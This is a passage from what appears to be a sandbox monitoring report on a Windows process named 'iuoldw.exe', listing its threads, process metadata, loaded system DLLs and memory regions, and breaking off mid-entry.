= 53 os_tid = 0x404 Thread: id = 54 os_tid = 0x154 Thread: id = 55 os_tid = 0x3c8 Thread: id = 56 os_tid = 0x398 Thread: id = 57 os_tid = 0x394 Thread: id = 58 os_tid = 0x358 Thread: id = 59 os_tid = 0x120 Thread: id = 60 os_tid = 0xf4 Thread: id = 61 os_tid = 0x3e8 Thread: id = 62 os_tid = 0x3dc Thread: id = 63 os_tid = 0x38c Thread: id = 64 os_tid = 0x37c Thread: id = 65 os_tid = 0x378 Thread: id = 66 os_tid = 0x374 Thread: id = 67 os_tid = 0x368 Thread: id = 68 os_tid = 0x360 Thread: id = 69 os_tid = 0xad4 Thread: id = 70 os_tid = 0xad8 Thread: id = 71 os_tid = 0xadc Thread: id = 72 os_tid = 0xb18 Thread: id = 73 os_tid = 0xb20 Thread: id = 74 os_tid = 0xb24 Thread: id = 75 os_tid = 0xb28 Thread: id = 77 os_tid = 0xbac Thread: id = 78 os_tid = 0xbb0 Thread: id = 79 os_tid = 0xbb4 Thread: id = 80 os_tid = 0xbb8 Thread: id = 81 os_tid = 0xbbc Thread: id = 82 os_tid = 0xbc0 Thread: id = 83 os_tid = 0xbc4 Thread: id = 84 os_tid = 0xbc8 Thread: id = 85 os_tid = 0xbcc Thread: id = 86 os_tid = 0xbd0 Thread: id = 87 os_tid = 0xbd4 Thread: id = 88 os_tid = 0xbd8 Thread: id = 89 os_tid = 0xbdc Thread: id = 90 os_tid = 0x794 Thread: id = 91 os_tid = 0x704 Thread: id = 92 os_tid = 0xc8 Thread: id = 93 os_tid = 0x5bc Thread: id = 94 os_tid = 0x94 Thread: id = 95 os_tid = 0x8c4 Thread: id = 96 os_tid = 0x830 Thread: id = 97 os_tid = 0x8f0 Thread: id = 98 os_tid = 0x244 Thread: id = 99 os_tid = 0x664 Thread: id = 104 os_tid = 0x62c Thread: id = 105 os_tid = 0x864 Thread: id = 111 os_tid = 0x9f4 Thread: id = 112 os_tid = 0x5dc Thread: id = 113 os_tid = 0x674 Thread: id = 114 os_tid = 0x998 Thread: id = 115 os_tid = 0xa14 Thread: id = 116 os_tid = 0x248 Thread: id = 145 os_tid = 0xa1c Thread: id = 146 os_tid = 0xa28 Thread: id = 155 os_tid = 0xa40 Thread: id = 156 os_tid = 0xa3c Thread: id = 157 os_tid = 0x940 Process: id = "6" image_name = "iuoldw.exe" filename = "c:\\users\\aetadzjz\\appdata\\roaming\\iuoldw.exe" page_root = "0x2f805000" os_pid = "0x65c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa50" cmd_line = "C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe " cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010636" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1135 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1136 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1137 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1138 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1139 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1140 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1141 start_va = 0x400000 end_va = 0x432fff entry_point = 0x400000 region_type = mapped_file name = "iuoldw.exe" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\iuoldw.exe") Region: id = 1142 start_va = 0x77090000 end_va = 0x77238fff entry_point = 0x77090000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1143 start_va = 0x77270000 end_va = 0x773effff entry_point = 0x77270000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1144 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1145 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1146 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1147 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1148 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1149 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1150 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1151 start_va = 0x2b0000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 1152 start_va = 0x746f0000 end_va = 0x746f7fff entry_point = 0x746f0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1153 start_va = 0x74700000 end_va = 0x7475bfff entry_point = 0x74700000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1154 start_va = 0x74760000 end_va = 0x7479efff entry_point = 0x74760000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1155 start_va = 0x550000 end_va = 0x64ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1156 start_va = 0x75250000 end_va = 0x75295fff entry_point = 0x75250000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1157 start_va = 0x759f0000 end_va = 0x75afffff entry_point = 0x759f0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1158 start_va = 0x76e70000 end_va = 0x76f69fff entry_point = 0x0 region_type = private name = "private_0x0000000076e70000" filename = "" Region: id = 1159 start_va = 0x76f70000 end_va = 0x7708efff entry_point = 0x0 region_type = private name = "private_0x0000000076f70000" filename = "" Region: id = 1160 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1161 start_va = 0x1a0000 end_va = 0x206fff entry_point = 0x1a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1162 start_va = 0x72940000 end_va = 0x72a92fff entry_point = 0x72940000 region_type = mapped_file name = "msvbvm60.dll" filename = "\\Windows\\SysWOW64\\msvbvm60.dll" (normalized: "c:\\windows\\syswow64\\msvbvm60.dll") Region: id = 1163 start_va = 0x74dc0000 end_va = 0x74dcbfff entry_point = 0x74dc0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1164 start_va = 0x74dd0000 end_va = 0x74e2ffff entry_point = 0x74dd0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1165 start_va = 0x74e90000 end_va = 0x74ea8fff entry_point = 0x74e90000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1166 start_va = 0x75130000 end_va = 0x751bffff entry_point = 0x75130000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1167 start_va = 0x752a0000 end_va = 0x7534bfff entry_point = 0x752a0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1168 start_va = 0x75450000 end_va = 0x755abfff entry_point = 0x75450000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1169 start_va = 0x755b0000 end_va = 0x7564cfff entry_point = 0x755b0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1170 start_va = 0x756e0000 end_va = 0x7577ffff entry_point = 0x756e0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1171 start_va = 0x75780000 end_va = 0x75789fff entry_point = 0x75780000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1172 start_va = 0x75790000 end_va = 0x7588ffff entry_point = 0x75790000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1173 start_va = 0x76b60000 end_va = 0x76beefff entry_point = 0x76b60000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1174 start_va = 0x76d80000 end_va = 0x76e6ffff entry_point = 0x76d80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1175 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1176 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1177 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 1178 start_va = 0x650000 end_va = 0x7d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 1179 start_va = 0x74e30000 end_va = 0x74e8ffff entry_point = 0x74e30000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1180 start_va = 0x75b00000 end_va = 0x75bcbfff entry_point = 0x75b00000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1181 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1182 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1183 start_va = 0x7e0000 end_va = 0x960fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1184 start_va = 0x970000 end_va = 0x1d6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 1185 start_va = 0x1d70000 end_va = 0x1eaffff entry_point = 0x0 region_type = private name = "private_0x0000000001d70000" filename = "" Region: id = 1186 start_va = 0x1eb0000 end_va = 0x22affff entry_point = 0x0 region_type = private name = "private_0x0000000001eb0000" filename = "" Region: id = 1187 start_va = 0x22b0000 end_va = 0x257efff entry_point = 0x22b0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1188 start_va = 0x330000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 1189 start_va = 0x210000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1190 start_va = 0x74660000 end_va = 0x746dffff entry_point = 0x74660000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1191 start_va = 0x2580000 end_va = 0x26fffff entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 1192 start_va = 0x440000 end_va = 0x51efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1193 start_va = 0x2700000 end_va = 0x286ffff entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 1194 start_va = 0x210000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1195 start_va = 0x230000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 1196 start_va = 0x74940000 end_va = 0x7499efff entry_point = 0x74940000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 1197 start_va = 0x74640000 end_va = 0x74652fff entry_point = 0x74640000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1198 start_va = 0x220000 end_va = 0x226fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 1199 start_va = 0x280000 end_va = 0x281fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 1200 start_va = 0x2870000 end_va = 0x2c62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002870000" filename = "" Region: id = 1201 start_va = 0x2c70000 end_va = 0x359ffff entry_point = 0x2c70000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 1202 start_va = 0x1d70000 end_va = 0x1deffff entry_point = 0x0 region_type = private name = "private_0x0000000001d70000" filename = "" Region: id = 1203 start_va = 0x1ea0000 end_va = 0x1eaffff entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 1204 start_va = 0x75c50000 end_va = 0x76899fff entry_point = 0x75c50000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1205 start_va = 0x750d0000 end_va = 0x75126fff entry_point = 0x750d0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1206 start_va = 0x74920000 end_va = 0x7493bfff entry_point = 0x74920000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1207 start_va = 0x77240000 end_va = 0x77245fff entry_point = 0x77240000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1208 start_va = 0x74910000 end_va = 0x74916fff entry_point = 0x74910000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1209 start_va = 0x290000 end_va = 0x297fff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 1210 start_va = 0x748f0000 end_va = 0x74901fff entry_point = 0x748f0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 1211 start_va = 0x75890000 end_va = 0x758c4fff entry_point = 0x75890000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1212 start_va = 0x2580000 end_va = 0x266ffff entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 1213 start_va = 0x26c0000 end_va = 0x26fffff entry_point = 0x0 region_type = private name = "private_0x00000000026c0000" filename = "" Region: id = 1214 start_va = 0x3a0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1215 start_va = 0x2700000 end_va = 0x27fffff entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 1216 start_va = 0x2860000 end_va = 0x286ffff entry_point = 0x0 region_type = private name = "private_0x0000000002860000" filename = "" Region: id = 1217 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1218 start_va = 0x35a0000 end_va = 0xb59ffff entry_point = 0x0 region_type = private name = "private_0x00000000035a0000" filename = "" Region: id = 1219 start_va = 0x400000 end_va = 0x41bfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1220 start_va = 0x758d0000 end_va = 0x759ecfff entry_point = 0x758d0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1221 start_va = 0x750c0000 end_va = 0x750cbfff entry_point = 0x750c0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1222 start_va = 0x74eb0000 end_va = 0x74eb4fff entry_point = 0x74eb0000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 1223 start_va = 0x75350000 end_va = 0x75444fff entry_point = 0x75350000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 1224 start_va = 0x76c40000 end_va = 0x76d75fff entry_point = 0x76c40000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 1225 start_va = 0x74ec0000 end_va = 0x750bafff entry_point = 0x74ec0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 1226 start_va = 0x748e0000 end_va = 0x748e7fff entry_point = 0x748e0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 1227 start_va = 0x1df0000 end_va = 0x1e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001df0000" filename = "" Region: id = 1228 start_va = 0x748c0000 end_va = 0x748d5fff entry_point = 0x748c0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1229 start_va = 0x2580000 end_va = 0x25bbfff entry_point = 0x2580000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1230 start_va = 0x2630000 end_va = 0x266ffff entry_point = 0x0 region_type = private name = "private_0x0000000002630000" filename = "" Region: id = 1231 start_va = 0x2580000 end_va = 0x25bbfff entry_point = 0x2580000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1232 start_va = 0x2580000 end_va = 0x25bbfff entry_point = 0x2580000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1233 start_va = 0x2580000 end_va = 0x25bbfff entry_point = 0x2580000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1234 start_va = 0x2580000 end_va = 0x25bbfff entry_point = 0x2580000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1235 start_va = 0x74880000 end_va = 0x748bafff entry_point = 0x74880000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1236 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1237 start_va = 0x330000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 1238 start_va = 0x360000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1239 start_va = 0x340000 end_va = 0x346fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1240 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1241 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1242 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1243 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1244 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1245 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1246 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1247 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1248 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1249 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1250 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1251 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1252 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1253 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1254 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1255 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1256 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1257 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1258 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1259 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1260 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1261 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1262 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1263 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1264 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1265 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1266 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1267 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1268 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1269 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1270 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1271 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1272 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1273 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1274 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1275 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1276 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1277 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1278 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1279 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1280 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1281 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1282 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1283 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1284 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1285 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1286 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1287 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1288 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1289 start_va = 